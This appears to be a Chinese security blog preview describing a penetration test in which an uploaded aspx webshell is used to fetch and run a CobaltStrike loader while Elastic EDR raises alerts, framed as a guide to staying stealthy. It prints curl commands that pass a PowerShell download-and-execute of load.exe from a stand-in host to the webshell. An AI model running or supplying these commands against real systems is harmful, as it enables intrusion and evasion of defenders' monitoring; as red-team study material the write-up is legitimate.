提高你的隐身能力

Ots安全 · 公众号 · · 2024-11-14 11:42

文章预览

在最近的一次评估中，我和我的队友负责对几个应用程序进行网络安全审查，如果有机会，还可以进行内部渗透测试。在其中一个应用程序上，我们成功上传了一个执行 Windows cmd 的 aspx webshell。这次攻击不需要我们保持隐秘，这篇博文的目的是重现我们在 Elastic EDR 监视下所做的事情。 Web远程代码执行我们下载了 CobaltStrike 加载程序并执行它 > curl http://website.crash.lab/webshell.aspx --data '70c1cc863a=powershell wget http://xxxx.com/load.exe -outfile C:\Windows\Temp\load.exe' > curl http://website.crash.lab/webshell.aspx --data '70c1cc863a=C:\Windows\Temp\load.exe' 我们找回了信标如果我们查看 Elastic EDR 中的警报，我们会发现噪音非常大。 Web Shell Detection: Script Process Child of Common Web Processes因为 IIS 进程w3wp.exe产生了cmd.exe Malicious Behavior Detection Alert: Suspicious Microsoft IIS Worker Descendantw3wp.exe因为生成 ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博